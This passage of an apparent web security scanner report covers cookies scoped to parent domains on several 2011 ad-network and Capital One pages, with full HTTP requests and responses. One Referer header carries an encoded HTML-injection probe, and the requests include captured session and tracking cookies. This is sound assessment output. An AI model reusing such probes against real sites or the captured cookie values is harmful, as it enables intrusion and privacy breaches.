Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=89F12CC9D638450E92DC23D5775C5EE7; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; usrID=675118e5-4035-33c8-e140-8075ff0d34cb; _FP=; MUID=E361C23374E642C998D8ABA7166A75EC; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO

Response

10.179. http://www.burstnet.com/enlightn/8117//3E06/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8117//3E06/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=193.1G7W^16w.1ETB^19q.1GKj^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Mon, 23-Jul-2012 14:52:40 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8117//3E06/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://corp.klout.com/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Sat, 23 Jul 2011 14:52:41 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GKj^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Mon, 23-Jul-2012 14:52:40 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.180. http://www.burstnet.com/enlightn/8171//99D2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8171//99D2/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMP=193.1G7W^16w.1ETB^19q.1GKj^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GKj^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Mon, 23-Jul-2012 14:53:06 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8171//99D2/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://widgets.klout.com/?from=ks
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=193.1G7W^16w.1ETB^19q.1GKj^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Sat, 23 Jul 2011 14:53:07 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GKj^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GKj^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Mon, 23-Jul-2012 14:53:06 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.181. http://www.capitalone.com/autoloans/before-you-apply.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/autoloans/before-you-apply.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

caponehp=HP73%3ATC00%3Abm%3D2%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autoloans/before-you-apply.php?linkid=WWW_Z_Z_Z_AC1_H1_16_G_ALAPP HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/autoloans/index.php?linkid=WWW_1009_Z_A2084B1F86C22A0D1FFBE38F9F1F85G5AF4H7CC8_HOME_C5_04_T_AC1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; BIGipServerpl_capitalone.com_443=778642698.65056.0000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; bank=dotcom; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; smartTracking=; ssotgt=f2eos; VS_COOKIE=Login; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0401

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:44:09 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 22778
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online Auto Loa
...[SNIP]...

10.182. http://www.capitalone.com/autoloans/redirect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/autoloans/redirect.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

caponehp=HP73%3ATC00%3Abm%3D2%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0401; expires=Sun, 21-Aug-2011 20:44:04 GMT; path=/; domain=.capitalone.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/redirect.php?Log=1&linkid=WWW_Z_Z_Z_AC1_H1_16_G_ALAPP&dest=https://www.capitaloneautofinance.com/Loan/ApplyNow/LoanApp.aspx HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/autoloans/index.php?linkid=WWW_1009_Z_A2084B1F86C22A0D1FFBE38F9F1F85G5AF4H7CC8_HOME_C5_04_T_AC1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; bank=dotcom; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; smartTracking=; ssotgt=f2eos; VS_COOKIE=Login

Response

HTTP/1.1 302 Found
Date: Fri, 22 Jul 2011 20:44:04 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0401; expires=Sun, 21-Aug-2011 20:44:04 GMT; path=/; domain=.capitalone.com
Location: ?linkid=WWW_Z_Z_Z_AC1_H1_16_G_ALAPP
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1

10.183. http://www.capitalone.com/directbanking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/directbanking/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

caponehp=HP73%3ATC00%3Abm%3D9%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:31:46 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D9%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: lpVsGroupTracker=ndb; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 41089
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.184. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

itc=CAPITALONE11NZZZDN1QSWZD4; expires=Sat, 10-Sep-2011 20:33:15 GMT; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/?linkid=WWW_Z_NDB_A0B0C0D0_SP29OA_C2_01_T_DBCDPL HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/?linkid=WWW_Z_NDB_A65A9B0C0D704AE0F0G708F_SP1_C4_02_T_SP29OA
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.capitalone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lpCloseInvite=null; v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb

open-account=1&x=28&y=13&promo=

Response

HTTP/1.1 302 Found
Date: Fri, 22 Jul 2011 20:33:15 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE11NZZZDN1QSWZD4; expires=Sat, 10-Sep-2011 20:33:15 GMT; path=/; domain=.capitalone.com
Location: http://www.capitalone.com/redirect.php?Log=1&linkid=WWW_Z_Z_Z_SP29OA_C1_01_G_SP29APP&dest=https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Content-Type: text/html; charset=utf-8

10.185. http://www.capitalone.com/redirect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/redirect.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

itc=CAPITALONE11NZZZDN1QSWZD4; expires=Tue, 20-Sep-2011 20:33:17 GMT; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.186. http://www.capitalone.com/stylesheets/https-common/header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/stylesheets/https-common/header.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=359592BA2979892B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stylesheets/https-common/header.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.capitalone.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:29:10 GMT
Server: Apache
Set-Cookie: v1st=359592BA2979892B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Tue, 27 Jul 2010 11:22:04 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 11036
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=745088266.29215.0000; path=/

/* /stylesheets/https-common/header.css - Header Style Sheet for Capital One Pages */

#header {
width: 760px;
height: 118px;
/*background: #fff url(/images/presentation/header/header
...[SNIP]...

10.187. http://www.othersonline.com/partner/scripts/myyearbook/alice.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.othersonline.com
Path:	/partner/scripts/myyearbook/alice.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:42 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/scripts/myyearbook/alice.js?autorun=true HTTP/1.1
Host: www.othersonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Cache-control: private
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 21 Jul 2011 18:01:42 GMT
Expires: Thu, 21 Jul 2011 19:01:42 GMT
Last-Modified: Thu, 21 Jul 2011 18:01:42 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: TRP Apache-Coyote/1.1
Set-Cookie: cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:42 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11218

/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */

oz_partner = "myyearbook";

if(typeof oz
...[SNIP]...

10.188. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.othersonline.com
Path:	/partner/scripts/myyearbook/page_parser.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:47 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/scripts/myyearbook/page_parser.js?d=games.myyearbook.com HTTP/1.1
Host: www.othersonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cd=false

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Cache-control: private
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 21 Jul 2011 18:01:47 GMT
Expires: Thu, 21 Jul 2011 19:01:48 GMT
Last-Modified: Thu, 21 Jul 2011 18:01:48 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: TRP Apache-Coyote/1.1
Set-Cookie: cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:47 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18060

/*! Copyright 2009,2010 Others Online Inc. All Rights Reserved. No permission is granted to use, copy or extend this code */

/*
*/

var oz_domain_element_map = {
id : "contentar
...[SNIP]...

10.189. http://www.wtp101.com/pull_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tuuid=58d1d589-451b-4796-8696-57c9a840b1c6; path=/; expires=Mon, 22 Jul 2013 04:48:34 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=adaptv HTTP/1.1
Host: www.wtp101.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: tuuid=58d1d589-451b-4796-8696-57c9a840b1c6

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sat, 23 Jul 2011 04:48:34 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://sync.adap.tv/sync?type=gif&key=adnetik&uid=58d1d589-451b-4796-8696-57c9a840b1c6
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=58d1d589-451b-4796-8696-57c9a840b1c6; path=/; expires=Mon, 22 Jul 2013 04:48:34 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

11. Cookie without HttpOnly flag set previous next
There are 238 instances of this issue:

http://ads.adxpose.com/ads/ads.js
http://c.microsoft.com/trans_pixel.aspx
http://dg.specificclick.net/
http://event.adxpose.com/event.flow
http://games.myyearbook.com/
http://games.myyearbook.com/landing/pool
http://hipservice.live.com/gethip.srf
http://home.myyearbook.com/Countries
http://home.myyearbook.com/feed/giftFeedItems
http://home.myyearbook.com/feed/myMagFeedItems
http://home.myyearbook.com/feed/tvFeedItems
http://members.boston.com/reg/rdb.do
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140
